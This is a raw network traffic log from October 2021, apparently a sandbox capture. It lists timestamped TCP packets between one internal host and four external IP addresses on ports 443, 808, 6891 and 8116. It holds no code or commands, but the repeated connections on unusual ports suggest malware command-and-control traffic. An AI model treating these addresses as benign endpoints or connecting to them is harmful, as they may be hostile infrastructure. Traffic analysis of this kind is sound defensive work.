Oct 28, 2021 05:28:51.268511057 CEST	443	50114	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:51.272281885 CEST	50114	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:51.272907972 CEST	50114	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:51.272918940 CEST	443	50114	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:51.273039103 CEST	50115	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:51.278218985 CEST	50114	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:51.278230906 CEST	443	50114	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:51.278418064 CEST	50114	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:51.278429985 CEST	443	50114	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:51.445776939 CEST	808	50115	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:51.446023941 CEST	50115	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:51.446758986 CEST	50115	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:51.619278908 CEST	808	50115	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:51.619488955 CEST	808	50115	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:51.619592905 CEST	50115	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:51.620145082 CEST	50115	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:51.623949051 CEST	50115	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:51.624062061 CEST	50115	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:51.792738914 CEST	808	50115	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:51.796448946 CEST	808	50115	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:51.796471119 CEST	808	50115	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:51.796545029 CEST	808	50115	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:51.988034964 CEST	443	50114	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:51.988111973 CEST	443	50114	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:51.992166042 CEST	50114	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:51.992208004 CEST	50114	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:51.992230892 CEST	50114	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:51.992269039 CEST	443	50114	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:52.120932102 CEST	50116	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:52.189874887 CEST	808	50115	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:52.189907074 CEST	808	50115	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:52.190000057 CEST	50115	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:52.198340893 CEST	50115	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:52.292989969 CEST	808	50116	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:52.293127060 CEST	50116	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:52.293685913 CEST	50116	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:52.319802046 CEST	50117	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:52.371103048 CEST	808	50115	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:52.465631962 CEST	808	50116	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:52.465658903 CEST	808	50116	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:52.465737104 CEST	50116	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:52.466279030 CEST	50116	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:52.470185041 CEST	50116	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:52.470320940 CEST	50116	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:52.486001968 CEST	6891	50117	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:52.486124039 CEST	50117	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:52.502207994 CEST	50117	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:52.638288975 CEST	808	50116	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:52.643081903 CEST	808	50116	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:52.643099070 CEST	808	50116	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:52.643106937 CEST	808	50116	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:52.668307066 CEST	6891	50117	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:52.668402910 CEST	6891	50117	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:52.668478012 CEST	50117	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:52.669064045 CEST	50117	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:52.673314095 CEST	50117	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:52.673484087 CEST	50117	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:52.839360952 CEST	6891	50117	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:52.839390039 CEST	6891	50117	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:53.037777901 CEST	808	50116	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:53.037806034 CEST	808	50116	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:53.037944078 CEST	50116	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:53.037982941 CEST	50116	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:53.040909052 CEST	50116	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:53.168139935 CEST	50118	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:53.212671995 CEST	808	50116	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:53.223797083 CEST	6891	50117	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:53.223823071 CEST	6891	50117	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:53.224046946 CEST	50117	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:53.234919071 CEST	50117	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:53.334352970 CEST	6891	50118	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:53.334597111 CEST	50118	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:53.335309029 CEST	50118	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:53.351182938 CEST	50119	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:53.401093960 CEST	6891	50117	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:53.404262066 CEST	8116	50119	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:53.404419899 CEST	50119	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:53.405186892 CEST	50119	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:53.458092928 CEST	8116	50119	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:53.458731890 CEST	8116	50119	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:53.458898067 CEST	50119	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:53.459793091 CEST	50119	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:53.468539000 CEST	50119	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:53.468787909 CEST	50119	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:53.501370907 CEST	6891	50118	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:53.501493931 CEST	6891	50118	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:53.501671076 CEST	50118	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:53.502295971 CEST	50118	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:53.507647038 CEST	50118	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:53.507770061 CEST	50118	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:53.521629095 CEST	8116	50119	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:53.521651983 CEST	8116	50119	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:53.561347008 CEST	8116	50119	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:53.673731089 CEST	6891	50118	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:53.673758030 CEST	6891	50118	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:53.713226080 CEST	8116	50119	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:53.713253021 CEST	8116	50119	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:53.713453054 CEST	50119	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:53.713494062 CEST	50119	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:53.720927954 CEST	50119	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:53.773994923 CEST	8116	50119	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:53.836162090 CEST	50120	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:53.836215019 CEST	443	50120	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:53.836313963 CEST	50120	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:53.836913109 CEST	50120	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:53.836942911 CEST	443	50120	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:54.051481009 CEST	6891	50118	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:54.051520109 CEST	6891	50118	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:54.051821947 CEST	50118	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:54.055052996 CEST	50118	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:54.173007965 CEST	50121	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:54.221097946 CEST	6891	50118	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:54.228543043 CEST	8116	50121	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:54.228703976 CEST	50121	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:54.229592085 CEST	50121	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:54.284996033 CEST	8116	50121	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:54.285031080 CEST	8116	50121	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:54.285474062 CEST	50121	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:54.286518097 CEST	50121	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:54.292193890 CEST	50121	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:54.292303085 CEST	50121	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:54.347625971 CEST	8116	50121	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:54.348227978 CEST	8116	50121	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:54.361901045 CEST	443	50120	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:54.361999989 CEST	50120	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:54.363152981 CEST	50120	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:54.363171101 CEST	443	50120	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:54.383320093 CEST	50120	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:54.383344889 CEST	443	50120	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:54.383440971 CEST	50120	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:54.383455038 CEST	443	50120	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:54.546143055 CEST	8116	50121	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:54.546179056 CEST	8116	50121	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:54.546359062 CEST	50121	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:54.546416044 CEST	50121	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:54.549396992 CEST	50121	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:54.604634047 CEST	8116	50121	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:54.663239002 CEST	50122	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:54.663300037 CEST	443	50122	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:54.663444996 CEST	50122	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:54.664303064 CEST	50122	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:54.664326906 CEST	443	50122	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:55.093590021 CEST	443	50120	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:55.093703032 CEST	443	50120	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:55.093858957 CEST	50120	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:55.107436895 CEST	50120	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:55.107480049 CEST	443	50120	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:55.178875923 CEST	443	50122	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:55.178987026 CEST	50122	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:55.179521084 CEST	50122	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:55.179536104 CEST	443	50122	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:55.184071064 CEST	50122	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:55.184091091 CEST	443	50122	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:55.184195042 CEST	50122	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:55.184206009 CEST	443	50122	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:55.257253885 CEST	50123	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:55.416541100 CEST	808	50123	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:55.416646957 CEST	50123	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:55.417629957 CEST	50123	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:55.576765060 CEST	808	50123	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:55.576977015 CEST	808	50123	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:55.577245951 CEST	50123	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:55.578332901 CEST	50123	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:55.583790064 CEST	50123	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:55.583879948 CEST	50123	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:55.737548113 CEST	808	50123	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:55.743037939 CEST	808	50123	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:55.743067980 CEST	808	50123	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:55.743076086 CEST	808	50123	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:55.894428015 CEST	443	50122	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:55.894526005 CEST	443	50122	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:55.894612074 CEST	50122	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:55.901160955 CEST	50122	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:55.901213884 CEST	443	50122	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:56.126169920 CEST	808	50123	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:56.126195908 CEST	808	50123	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:56.126265049 CEST	50123	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:56.126987934 CEST	50123	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:56.132352114 CEST	50123	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:56.225596905 CEST	50124	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:56.285486937 CEST	50125	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:56.291583061 CEST	808	50123	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:56.391582966 CEST	808	50124	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:56.396855116 CEST	50124	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:56.397974968 CEST	50124	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:56.453108072 CEST	6891	50125	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:56.453298092 CEST	50125	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:56.454010963 CEST	50125	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:56.564243078 CEST	808	50124	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:56.564285040 CEST	808	50124	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:56.564419985 CEST	50124	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:56.565129995 CEST	50124	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:56.569648027 CEST	50124	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:56.569767952 CEST	50124	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:56.620115995 CEST	6891	50125	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:56.620141983 CEST	6891	50125	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:56.620321035 CEST	50125	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:56.731467962 CEST	808	50124	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:56.735842943 CEST	808	50124	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:56.735869884 CEST	808	50124	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:56.735886097 CEST	808	50124	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:56.735902071 CEST	808	50124	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:57.087753057 CEST	50125	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:57.091825962 CEST	50125	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:57.092087984 CEST	50125	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:57.111907005 CEST	808	50124	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:57.111954927 CEST	808	50124	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:57.112004042 CEST	50124	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:57.112037897 CEST	50124	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:57.115763903 CEST	50124	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:57.252654076 CEST	50126	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:57.258023977 CEST	6891	50125	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:57.258112907 CEST	6891	50125	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:57.258219957 CEST	6891	50125	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:57.281794071 CEST	808	50124	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:57.418736935 CEST	6891	50126	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:57.418961048 CEST	50126	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:57.419740915 CEST	50126	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:57.585796118 CEST	6891	50126	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:57.585869074 CEST	6891	50126	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:57.585998058 CEST	50126	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:57.634574890 CEST	50126	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:57.637195110 CEST	50126	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:57.637273073 CEST	50126	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:57.641983986 CEST	6891	50125	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:57.642028093 CEST	6891	50125	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:57.642224073 CEST	50125	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:57.803976059 CEST	6891	50126	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:58.188453913 CEST	6891	50126	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:58.188489914 CEST	6891	50126	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:58.188673019 CEST	50126	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:58.188721895 CEST	50126	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:58.764691114 CEST	50125	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:58.778832912 CEST	50126	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:58.897388935 CEST	50127	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:58.910489082 CEST	50128	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:58.931436062 CEST	6891	50125	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:58.944957972 CEST	6891	50126	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:58.952632904 CEST	8116	50127	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:58.952903032 CEST	50127	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:58.967591047 CEST	8116	50128	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:58.967767954 CEST	50128	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:58.968878031 CEST	50128	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:58.974946976 CEST	50127	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:59.025055885 CEST	8116	50128	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:59.025304079 CEST	8116	50128	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:59.025367022 CEST	50128	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:59.026587963 CEST	50128	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:59.029289961 CEST	50128	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:59.029337883 CEST	8116	50127	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:59.029369116 CEST	50128	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:59.029459953 CEST	8116	50127	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:59.029511929 CEST	50127	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:59.030071020 CEST	50127	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:59.032644033 CEST	50127	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:59.032733917 CEST	50127	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:59.083964109 CEST	8116	50128	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:59.083986044 CEST	8116	50128	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:59.086935997 CEST	8116	50128	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:59.087677002 CEST	8116	50127	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:59.088107109 CEST	8116	50127	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:59.088408947 CEST	8116	50127	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:59.258335114 CEST	8116	50127	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:59.258363008 CEST	8116	50127	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:59.258436918 CEST	50127	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:59.258471012 CEST	50127	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:59.264714956 CEST	50127	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:59.274801016 CEST	8116	50128	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:59.274826050 CEST	8116	50128	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:59.274914980 CEST	50128	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:59.274949074 CEST	50128	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:59.277081966 CEST	50128	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:59.319216967 CEST	8116	50127	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:59.331449032 CEST	8116	50128	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:59.382761002 CEST	50129	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:59.382802963 CEST	443	50129	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:59.382910967 CEST	50129	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:59.383424997 CEST	50129	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:59.383441925 CEST	443	50129	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:59.402499914 CEST	50130	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:59.402542114 CEST	443	50130	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:59.402668953 CEST	50130	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:59.406224012 CEST	50130	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:59.406251907 CEST	443	50130	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:59.901909113 CEST	443	50130	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:59.902148962 CEST	50130	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:59.902898073 CEST	50130	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:59.902920961 CEST	443	50130	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:59.908682108 CEST	50130	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:59.908705950 CEST	443	50130	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:59.908806086 CEST	50130	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:59.908816099 CEST	443	50130	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:59.912262917 CEST	443	50129	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:59.912424088 CEST	50129	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:59.913085938 CEST	50129	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:59.913098097 CEST	443	50129	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:59.917972088 CEST	50129	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:59.917983055 CEST	443	50129	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:59.918154001 CEST	50129	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:59.918165922 CEST	443	50129	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:00.599265099 CEST	443	50130	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:00.599333048 CEST	443	50130	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:00.599350929 CEST	50130	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:00.599397898 CEST	50130	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:00.603446007 CEST	50130	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:00.603473902 CEST	443	50130	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:00.626092911 CEST	443	50129	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:00.626159906 CEST	443	50129	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:00.626202106 CEST	50129	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:00.626251936 CEST	50129	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:00.634366989 CEST	50129	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:29:00.634388924 CEST	443	50129	192.46.210.220	192.168.2.3
Oct 28, 2021 05:29:00.742412090 CEST	50131	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:00.772777081 CEST	50132	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:00.902074099 CEST	808	50131	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:00.902241945 CEST	50131	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:00.903094053 CEST	50131	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:00.930996895 CEST	808	50132	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:00.931154966 CEST	50132	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:00.931849003 CEST	50132	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:01.062443018 CEST	808	50131	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:01.062542915 CEST	808	50131	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:01.062604904 CEST	50131	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:01.063107967 CEST	50131	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:01.066992044 CEST	50131	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:01.067116976 CEST	50131	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:01.089832067 CEST	808	50132	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:01.089912891 CEST	808	50132	143.244.140.214	192.168.2.3
Oct 28, 2021 05:29:01.089977980 CEST	50132	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:29:01.090432882 CEST	50132	808	192.168.2.3	143.244.140.214
